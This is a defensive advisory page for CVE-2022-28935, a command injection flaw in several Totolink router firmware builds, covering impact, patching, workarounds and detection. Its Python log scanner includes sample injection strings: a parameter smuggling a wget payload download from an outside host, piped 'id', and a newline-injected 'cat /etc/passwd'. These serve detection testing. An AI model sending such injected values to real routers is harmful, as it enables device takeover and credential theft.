CVE-2022-28935

7.2 HIGH

📋 TL;DR

This CVE describes a command injection vulnerability in six Totolink router models that lets an attacker who can reach the router's web administration interface execute arbitrary OS commands on the device. Because the web server on this class of device normally runs as root, a successful injection is a full compromise of the router. The vulnerability is tied to specific firmware builds of the Totolink A830R, A3100R, A950RG, A800R, A3000RU, and A810R.

💻 Affected Systems

Products and affected firmware versions:
  • Totolink A830R, firmware V5.9c.4729_B20191112
  • Totolink A3100R, firmware V4.1.2cu.5050_B20200504
  • Totolink A950RG, firmware V4.1.2cu.5161_B20200903
  • Totolink A800R, firmware V4.1.2cu.5137_B20200730
  • Totolink A3000RU, firmware V5.9c.5185_B20201128
  • Totolink A810R, firmware V4.1.2cu.5182_B20201026
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects specific firmware versions only. Other versions may or may not be vulnerable.

📦 What is this software?

Consumer and small-office wireless routers from Totolink. The firmware is an embedded Linux image administered through a browser-based admin interface, which is where the injectable request parameter is reached.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of router with persistent backdoor installation, credential theft, network traffic interception, and lateral movement to connected devices.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential harvesting, and network disruption.

🟢

If Mitigated

Limited impact if the router's administration interface is not reachable from the WAN, admin credentials have been changed from the defaults, and the device sits in a segmented management network where only designated admin hosts can reach it.

🌐 Internet-Facing: HIGH - Routers are typically internet-facing devices, making them directly accessible to attackers.
🏢 Internal Only: MEDIUM - Internal attackers could exploit if they gain network access, but external exposure is primary concern.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Questionable. A 7.2 base score under CVSS 3.x corresponds to AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, i.e. the injection sits behind the authenticated admin interface; in practice, default or unchanged admin credentials make that barrier negligible.
Complexity: LOW

Command injection in a router web interface is exploited with a single crafted HTTP request that places a shell metacharacter (;, |, a backtick, $( ), or a newline) in the affected parameter, so once public PoC details exist there is no meaningful skill barrier. The public references for this CVE are PoC write-ups rather than a vendor advisory.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: Yes

Instructions:

1. Check the Totolink website for a firmware update for your exact model and hardware revision
2. Download the firmware only from the vendor site and note its published checksum if one is provided
3. Log in to the router admin interface from the LAN side
4. Navigate to the firmware upgrade section
5. Upload and apply the new firmware
6. Reboot the router and confirm the version string no longer matches the affected list

🔧 Temporary Workarounds

Disable Remote Management (all models)

Prevent WAN-side access to the router administration interface; keep the admin UI reachable only from the LAN.

Network Segmentation (all models)

Isolate the routers' management interfaces in a separate network segment with strict firewall rules so that only designated admin hosts can reach them.

🧯 If You Can't Patch

  • Replace affected routers with patched or different vendor models
  • Implement strict network access controls and monitor for suspicious activity

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface against affected versions list

Check Version:

Login to router admin interface and check System Status or Firmware Information page

Verify Fix Applied:

Verify firmware version has been updated to a version not in the affected list

📡 Detection & Monitoring

Log Indicators:

  • Admin interface requests whose parameters contain shell metacharacters (; | ` $( && or a newline), including their URL-encoded forms (%3B %7C %60 %24%28 %26%26 %0A)
  • Multiple failed login attempts followed by successful access
  • Unexpected configuration changes (DNS servers, remote management, port forwards, new admin accounts)

Network Indicators:

  • Unusual outbound connections from router
  • DNS queries to suspicious domains
  • Port scanning originating from router

SIEM Query:

Router syslog rarely carries a `command` field; point the query at whichever field holds the request URL or form body for your log source (`request` below is a placeholder), and either URL-decode it before matching or include the encoded forms as shown:

source="router_logs" AND (request="*;*" OR request="*|*" OR request="*`*" OR request="*$(*" OR request="*%3B*" OR request="*%7C*" OR request="*%60*" OR request="*%24%28*" OR request="*%0A*")
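The wildcard query above misses double-encoded payloads and matches on raw text only. As an added example (not code from this page, from Totolink, or from any PoC), the following Python applies the same indicator to a constructed, simplified request log: it splits query-string and form parameters, URL-decodes each value up to twice, and flags values that contain a shell metacharacter. The log format, the client addresses, and the `/cgi-bin/admin.cgi` path are all placeholders.

```python
"""Flag router admin requests whose parameters carry shell metacharacters.

Added example for this page. The log format below is constructed and the
path /cgi-bin/admin.cgi is a placeholder, not a real Totolink endpoint.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Sequences that let a parameter value break out of a shell command line.
# "\n" is included because a newline separates commands just like ";".
SHELL_META = re.compile(r"[;|`\n]|\$\(|&&")

# Constructed format: "<client> <method> <path[?query]> [<urlencoded body>]"
LOG_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<body>\S+))?$"
)


def decode_param(value, max_rounds=2):
    """URL-decode a value until it stops changing (bounded), so that both
    single-encoded (%3B) and double-encoded (%2524%2528) payloads are seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_pairs(encoded):
    """Split an application/x-www-form-urlencoded string into (name, raw value)
    pairs without decoding the value yet. Splitting only on '&' (never ';')
    keeps an injected ';' inside the value where we want to see it."""
    pairs = []
    for part in encoded.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), value))
    return pairs


def suspicious_params(target, body=None):
    """Return [(name, decoded_value)] for every query or body parameter whose
    decoded value contains a shell metacharacter."""
    pairs = split_pairs(urlsplit(target).query)
    if body:
        pairs += split_pairs(body)
    hits = []
    for name, raw in pairs:
        decoded = decode_param(raw)
        if SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Parse constructed log lines; return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the constructed format
        hits = suspicious_params(m["target"], m["body"])
        if hits:
            findings.append(
                {"client": m["client"], "target": m["target"], "params": hits}
            )
    return findings


# Constructed sample log: two benign requests, then four injection attempts
# (plain ';', encoded '|', double-encoded '$(...)', encoded newline).
SAMPLE_LOG = [
    "192.0.2.10 GET /status.html?page=1",
    "192.0.2.10 POST /cgi-bin/admin.cgi ntp_server=pool.ntp.org",
    "203.0.113.5 POST /cgi-bin/admin.cgi ntp_server=pool.ntp.org;wget+http://203.0.113.5/x+-O+/tmp/x",
    "203.0.113.5 GET /cgi-bin/admin.cgi?host=127.0.0.1%7Cid",
    "203.0.113.5 GET /cgi-bin/admin.cgi?host=127.0.0.1%2524%2528id%2529",
    "203.0.113.5 POST /cgi-bin/admin.cgi host=127.0.0.1%0Acat%20/etc/passwd",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["target"], finding["params"])
```

When porting this to a SIEM, apply the decode step before the pattern match rather than enumerating encodings in the query. A single `&` (background operator) is deliberately left out of `SHELL_META` because it appears in benign values such as SSIDs; add it if your environment can tolerate the false positives.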
